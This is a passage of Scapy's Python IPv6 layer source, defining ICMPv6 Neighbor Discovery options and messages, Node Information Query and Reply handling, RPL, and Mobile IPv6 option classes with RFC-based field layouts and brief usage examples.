class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust=lambda pkt, x: 2 * x + 1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from=lambda pkt: 8 * (pkt.len - 1))]
def mysummary(self):
return self.sprintf("%name% " + ", ".join(self.dns))
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48)]
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
# described in section 3.1 of RFC 1035
# XXX Label should be at most 63 octets in length : we do not enforce it
# Total length of domain should be 255 : we do not enforce it either
class DomainNameListField(StrLenField):
__slots__ = ["padded"]
islist = 1
padded_unit = 8
def __init__(self, name, default, length_from=None, padded=False): # noqa: E501
self.padded = padded
StrLenField.__init__(self, name, default, length_from=length_from)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def m2i(self, pkt, x):
x = plain_str(x) # Decode bytes to string
res = []
while x:
# Get a name until \x00 is reached
cur = []
while x and ord(x[0]) != 0:
tmp_len = ord(x[0])
cur.append(x[1:tmp_len + 1])
x = x[tmp_len + 1:]
if self.padded:
# Discard following \x00 in padded mode
if len(cur):
res.append(".".join(cur) + ".")
else:
# Store the current name
res.append(".".join(cur) + ".")
if x and ord(x[0]) == 0:
x = x[1:]
return res
def i2m(self, pkt, x):
def conditionalTrailingDot(z):
if z and orb(z[-1]) == 0:
return z
return z + b'\x00'
# Build the encode names
tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501
ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
# In padded mode, add some \x00 bytes
if self.padded and not len(ret_string) % self.padded_unit == 0:
ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501
return ret_string
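# Encoding sketch: "scapy.net." is emitted as the RFC 1035 label sequence
# b"\x05scapy\x03net\x00"; in padded mode the result is then zero-padded
# to a multiple of 8 bytes, as required inside ND options.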
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1 + x // 8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8 * pkt.len - 8,
padded=True)
]
def mysummary(self):
return self.sprintf("%name% " + ", ".join(self.searchlist))
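# Example (illustrative; the domain is a placeholder, not a default): a
# DNSSL option carrying one search domain can be built as
#   >>> ICMPv6NDOptDNSSL(searchlist=["example.com."], lifetime=300)
# DomainNameListField pads the encoded list to a multiple of 8 bytes and
# the 'len' field is derived from the padded length.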
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ByteEnumField("type", 133, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
IntField("res", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ByteEnumField("type", 134, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ByteField("chlim", 0),
BitField("M", 0, 1),
BitField("O", 0, 1),
BitField("H", 0, 1),
BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191
BitField("P", 0, 1),
BitField("res", 0, 2),
ShortField("routerlifetime", 1800),
IntField("reachabletime", 0),
IntField("retranstimer", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
def mysummary(self):
return self.sprintf("%name% Lifetime %routerlifetime% "
"Hop Limit %chlim% Preference %prf% "
"Managed %M% Other %O% Home %H%")
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ByteEnumField("type", 135, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt", "::")]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return bytes_encode(self.tgt) + self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ByteEnumField("type", 136, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
BitField("R", 1, 1),
BitField("S", 0, 1),
BitField("O", 1, 1),
XBitField("res", 0, 29),
IP6Field("tgt", "::")]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return bytes_encode(self.tgt) + self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
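# Example (illustrative; the target address is a placeholder): probing a
# neighbor by hand with an NS/NA exchange might look like
#   >>> ns = IPv6(dst="2001:db8::1") / ICMPv6ND_NS(tgt="2001:db8::1")
#   >>> na = sr1(ns, timeout=1)
# The NA answers the NS when both carry the same 'tgt' (see answers()).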
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ByteEnumField("type", 137, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XIntField("res", 0),
IP6Field("tgt", "::"),
IP6Field("dst", "::")]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ByteField("type", 9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust=lambda pkt, x: 2 * x + 1),
StrFixedLenField("res", b"\x00" * 6, 6),
IP6ListField("addrlist", [],
length_from=lambda pkt: 8 * (pkt.len - 1))]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC 3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As suggested in the document, it would be nice to take the L2 address
#   requested in the mandatory target lladdr option and use it as the
#   Ethernet destination address when none is specified.
# - That does not seem very practical if the user has to specify all
#   the options anyway.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ByteEnumField("type", 141, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XIntField("reserved", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
# Required options: target lladdr, target address list
# Other valid options: MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ByteEnumField("type", 142, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XIntField("reserved", 0)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). It should be possible to disable them.
icmp6_niqtypes = {0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address"}
class _ICMPv6NIHashret:
def hashret(self):
return bytes_encode(self.nonce)
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
@conf.commands.register
def computeNIGroupAddr(name):
"""Compute the NI group Address. Can take a FQDN as input parameter"""
name = name.lower().split(".")[0]
record = chr(len(name)) + name
h = md5(record.encode("utf8"))
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
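# Example usage (illustrative): the NI group address is derived from the
# MD5 of the lowercased first label of the name, so any FQDN works:
#   >>> computeNIGroupAddr("host.example.com")
#   'ff02::2:xxxx:xxxx'   (the actual value depends on the hash of "host")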
# Here is the deal. First, that protocol is a mess. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specific
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overridden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overridden
# - Name in the other cases: code is set to 0, if not overridden by user
#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
    and encode it in DNS format (with possible compression).
    If a byte string that is already a DNS name in DNS format
    is passed, it is returned unmodified. Result is a byte string.
!!! At the moment, compression is not implemented !!!
"""
if isinstance(x, bytes):
if x and x[-1:] == b'\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = b"\x00"
if n.count(b'.') == 0: # single-component gets one more
termin += b'\x00'
n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
res.append(n)
return b"".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
    and return a list of DNS names contained in it.
    If the provided string is already in printable format
    (i.e. does not end with a null character), a one-element
    list is returned. Result is a list.
"""
res = []
cur = b""
while x:
tmp_len = orb(x[0])
x = x[1:]
if not tmp_len:
if cur and cur[-1:] == b'.':
cur = cur[:-1]
res.append(cur)
cur = b""
if x and orb(x[0]) == 0: # single component
x = x[1:]
continue
if tmp_len & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
cur += x[:tmp_len] + b"."
x = x[tmp_len:]
return res
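# Example (illustrative) of the reverse operation:
#   >>> dnsrepr2names(b'\x03www\x07example\x03com\x00')
#   [b'www.example.com']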
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t, val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
        if isinstance(x, tuple) and isinstance(x[0], int):
            return x
        if isinstance(x, str):
            # Accept plain strings as well as bytes
            x = x.encode()
# Try IPv6
try:
inet_pton(socket.AF_INET6, x.decode())
return (0, x.decode())
except Exception:
pass
# Try IPv4
try:
inet_pton(socket.AF_INET, x.decode())
return (2, x.decode())
except Exception:
pass
# Try DNS
if x is None:
x = b""
x = names2dnsrepr(x)
return (1, x)
def i2repr(self, pkt, x):
t, val = x
if t == 1: # DNS Name
            # we don't use dnsrepr2names() here so that we can cope with
            # possibly malformed data extracted from the wire
res = []
while val:
tmp_len = orb(val[0])
val = val[1:]
if tmp_len == 0:
break
res.append(plain_str(val[:tmp_len]) + ".")
val = val[tmp_len:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return b"", (1, s)
def addfield(self, pkt, s, val):
if ((isinstance(val, tuple) and val[1] is None) or
val is None):
val = (1, b"")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None)]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
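# Example (illustrative; the peer address is a placeholder): querying the
# IPv6 addresses known by a node, identified by its name, could be written
#   >>> p = IPv6(dst="2001:db8::1") / ICMPv6NIQueryIPv6(data=b"host.example.com")  # noqa: E501
#   >>> r = sr1(p, timeout=1)
# NIQueryDataField guesses the data type (a name here) and NIQueryCodeField
# sets 'code' accordingly.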
_nireply_code = {0: "Successful Reply",
                 1: "Response Refusal",
                 2: "Unknown query type"}
_nireply_flags = {1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses"}
# Internal repr is one of those :
# (0, "some string") : unknown qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t, val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if not isinstance(x, tuple):
if pkt is not None:
qtype = pkt.qtype
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if isinstance(x, (str, bytes)): # listify the string
x = [x]
if isinstance(x, list):
x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501
if x and isinstance(x[0], six.integer_types):
ttl = x[0]
names = x[1:]
else:
ttl = 0
names = x
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if not isinstance(x, list):
x = [x] # User directly provided an IP, instead of list
def fixvalue(x):
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
if not isinstance(x, tuple):
x = (0, x)
# Decode bytes
if six.PY3 and isinstance(x[1], bytes):
x = (x[0], x[1].decode())
return x
return (qtype, [fixvalue(d) for d in x])
return (qtype, x)
def addfield(self, pkt, s, val):
t, tmp = val
if tmp is None:
tmp = b""
if t == 2:
ttl, dnsstr = tmp
return s + struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501
elif t == 4:
return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, b"")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, b"")
elif qtype == 2:
if len(s) < 4:
return s, (0, b"")
ttl = struct.unpack("!I", s[:4])[0]
return b"", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return b"", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if isinstance(x, tuple) and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl, tmp_len = val
tmp_len = dnsrepr2names(tmp_len)
names_list = (plain_str(name) for name in tmp_len)
return "ttl:%d %s" % (ttl, ",".join(names_list))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = orb(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = {0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = orb(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = {2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
#############################################################################
#############################################################################
# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
rplcodes = {0: "DIS",
1: "DIO",
2: "DAO",
3: "DAO-ACK",
# 4: "P2P-DRO",
# 5: "P2P-DRO-ACK",
# 6: "Measurement",
7: "DCO",
8: "DCO-ACK"}
class ICMPv6RPL(_ICMPv6): # RFC 6550
name = 'RPL'
fields_desc = [ByteEnumField("type", 155, icmp6types),
ByteEnumField("code", 0, rplcodes),
XShortField("cksum", None)]
overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
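# Example (illustrative): a bare DIS message; the IPv6 destination is
# overloaded with the all-RPL-nodes multicast address ff02::1a:
#   >>> p = IPv6() / ICMPv6RPL(code=0)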
#############################################################################
#############################################################################
# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15)]
def hashret(self):
return struct.pack("!H", self.id) + self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None)]
def hashret(self):
return struct.pack("!H", self.id) + self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0)]
    def hashret(self):
return struct.pack("!H", self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
XBitField("res", 0, 14)]
def hashret(self):
return struct.pack("!H", self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = {2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)"}
class _MIP6OptAlign(Packet):
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
__slots__ = ["x", "y"]
def alignment_delta(self, curpos):
x = self.x
y = self.y
if x == 0 and y == 0:
return 0
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
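    # Worked example (illustrative): for an option with alignment 8n+2
    # (x=8, y=2) currently at position curpos=5,
    #   delta = 8 * ((5 - 2 + 8 - 1) // 8) + 2 - 5 = 5
    # i.e. 5 bytes of padding move the option to offset 10 = 8*1 + 2.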
def extract_padding(self, p):
return b"", p
class MIP6OptBRAdvice(_MIP6OptAlign):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0)]
x = 2
y = 0 # alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::")]
x = 8
y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0)]
x = 2
y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96)]
x = 8
y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::")]
x = 8
y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY)] # Only support ethernet
x = 0
y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust=lambda pkt, x: x + 1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from=lambda pkt: pkt.olen - 1)]
x = 0
y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust=lambda pkt, x: x + 5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501
2: "MN-AAA authentication mobility option"}), # noqa: E501
IntField("mspi", None),
StrLenField("authdata", "A" * 12,
length_from=lambda pkt: pkt.olen - 5)]
x = 4
y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
def i2repr(self, pkt, x):
if x < ((50 * 31536000) << 32):
return "Some date a few decades ago (%d)" % x
        # Seconds between the NTP epoch (1900-01-01T00:00:00) and the
        # Unix epoch (1970-01-01T00:00:00): 25567 days * 86400 s
        delta = -2208988800
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0)]
x = 8
y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0)]
x = 0
y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
